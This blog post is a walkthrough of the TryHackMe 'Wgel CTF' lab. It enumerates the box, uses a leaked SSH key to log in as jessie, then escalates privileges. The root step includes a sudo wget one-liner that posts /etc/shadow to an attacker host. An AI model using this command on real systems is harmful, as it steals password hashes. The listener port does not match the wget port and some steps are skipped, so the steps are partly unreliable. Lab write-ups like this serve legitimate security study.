Skip to main content
HashnodeCyberWithSharon

Command Palette

Search for a command to run...

Challenges: wgelctf (TryHackMe)

Updated
1 min read
Challenges: wgelctf (TryHackMe)
J
Jebitok

Software Developer | Learning Cybersecurity | Open for roles *

If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.

Wgel CTF

Start Machine

Have fun with this easy box.

Answer the questions below

  1. User flag

    nmap -sC -sV IP_Address

    on the source code of http://IP_ADDRESS there’s comment with name jessie

    just look around the site and enumerating we find the /sitemap/ path that has this interesting .ssh folder and several paths that didn’t have much helpful info

    gobuster dir -u http://IP_Address/sitemap/ -w /usr/share/wordlists/dirb/common.txt

    we copied the id_rsa into a file and set permissions. Then used id_rsa to low access, jessie, for the user flag

    ssh -i id_rsa jessie@<TARGET_IP>

    ls

    ls -la /Documents

    cat /Documents/user_flag.txt

  2. Root flag

    after running sudo -l my first thought was to check sudo under wget on GTFOBINS but it was a bit complicated later on learned of a different way through this article and GPT.

    sudo wget —post-file=/etc/shadow http://ATT_IP:443

    nc -lvnp 8000

    ls

    cat root_flag.txt

#gobuster#privilege-escalation#ctf-writeup#tryhackme#wget
7 views

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

C

CyberWithSharon

432 posts